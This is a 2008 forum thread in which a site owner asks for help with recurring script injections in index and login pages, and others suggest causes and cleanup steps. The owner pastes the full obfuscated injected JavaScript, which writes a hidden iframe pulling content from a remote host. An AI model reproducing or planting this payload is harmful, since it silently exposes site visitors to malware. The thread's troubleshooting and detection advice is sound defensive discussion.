Page 1 of 1
got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 12:20 am
by jawedshamshedi
Hi all,
I have a website running, it was fine few days back but now when a open the site it opens a blank page then i checed the code of the index page then i found that there is a javascript ebmedded in my code in all index pages and login pages, this javascirpt did open a blank page.
I dowloaded whole site, deleted the code form the server scanned the code with kerpersky antivirus and notorn antivirus , both did not showed any virus in the code then i manuallyu checked all index and login named pages and no malacious code was there then i uploaded the site again , but for my bad luck then virus again come in Iframe.ph and again the site is not opening due to the same javascript code??????
Can anyone help me in this regard ?????
Re: got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 3:24 am
by jaoudestudios
What text editor are you using?
As I know Dreamweaver enters lots of unwanted javascript.
Can you paste some of the code here so we can see it?
Re: got a virus named Iframe.ph on my server
Posted: Sun Jul 06, 2008 5:52 am
by Apollo
Most likely some gained access to your webdirectory and infected some scripts.
Where is your website hosted?
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 12:10 am
by jawedshamshedi
Hi
thanks for the respnse , i am using dreamweaver cs3 and my site is hosted on netsol. The problem is all the files named as index and login are affected, all the codes in these files get lost and this javascript is embedded
<script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script>
I tried many things but none worked out, even i removed the write permission of index and login files but this too did not work.
Thanks in advance for any kind of help
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 7:04 am
by Mordred
Scan your developer machine. There are malwares that do what you describe from your own machine.
For a workaround, zip your site and upload it from a cleanly installed OS.
Re: got a virus named Iframe.ph on my server
Posted: Mon Jul 07, 2008 3:29 pm
by orbitz
you also might have some apps that have vulnerability. Make sure to update those apps.
Re: got a virus named Iframe.ph on my server
Posted: Tue Jul 08, 2008 6:25 am
by jawedshamshedi
thanks for the post, i already did all these, download whole site scanned with norton and kersperky anti virus, manually checked pages coding but nothing wrong was in those code, and again the virus came, one more thing i wanted to add is that i am using some Open source code like list, forums and event calender , so can this be a reason ?????? means the open source code is putting some scripts lke this ????
Re: got a virus named Iframe.ph on my server
Posted: Wed Jul 09, 2008 3:06 am
by Maugrim_The_Reaper
Could be a bot driven attack from an external source - are you using any PHP application which would be considered old or insecure? One popular example is PHPNuke or older versions of phpBB. These are so common they attract automated attacks.
The other option is to contact your hosting provider in case it's not just a simpler code injection attack. Maybe a google search of the javascript could turn up similar cases elsewhere also?
Re: got a virus named Iframe.ph on my server
Posted: Fri Jul 18, 2008 12:01 pm
by Reviresco
I have had similar problems with one of my Network Solutions sites, but not the exact same scripts you've been getting. As far as I can tell, they hacked the server and put malicious files in my directories. I think the security holes have been fixed, but the scripts continued to wreak havoc until I found them.
First be sure to change your FTP login name and password. Then look through all your files and folders for anything you didn't make yourself. They're often placed in "images" folders, sometimes in a new folder called "thumbnails".
The files are often called things like "left_menu.php" or "right_menu.php". You'll see that there will be some encrypted code, which is run using eval(base64_decode()). You also will probably find a script that calls the php function system().
At least -- this is what was causing the problems for me.